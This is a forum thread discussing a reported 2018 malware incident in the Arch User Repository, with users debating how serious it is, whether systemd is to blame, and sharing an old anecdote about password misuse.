The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/0 ... h-malware/
Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."
Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.
Arch User Repository compromised. Malware added
-
spiritwild
- Posts: 181
- Joined: Mon 03 Oct 2016, 10:06
What exactly has been compromised?
AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/ ... h=palemoon
There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/ ... h=palemoon
There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.
Blame is being placed on systemd
quotes:
The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…
and a "few" others.
Be carefull folks....
quotes:
The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.
looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…
and a "few" others.
Be carefull folks....
Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?scsijon wrote:looks like systemd makes it easier for compromises - one platform (systemdOS) one payload.
In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true but murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak
-
spiritwild
- Posts: 181
- Joined: Mon 03 Oct 2016, 10:06
I remember, about 20 years ago on a nascar forum, someone thought they would open a file account and give all the users the name and password info in a public message.
I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.
I made it known that I thought that was not a good Idea because of obvious reasons but my concerns fell on deaf ears.
When it was hacked and someone changed the password, They all blamed me. Because no one else on the whole damn planet would have though to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.
Ah the good ol days.
I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.
I made it known that I thought that was not a good Idea because of obvious reasons but my concerns fell on deaf ears.
When it was hacked and someone changed the password, They all blamed me. Because no one else on the whole damn planet would have though to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.
Ah the good ol days.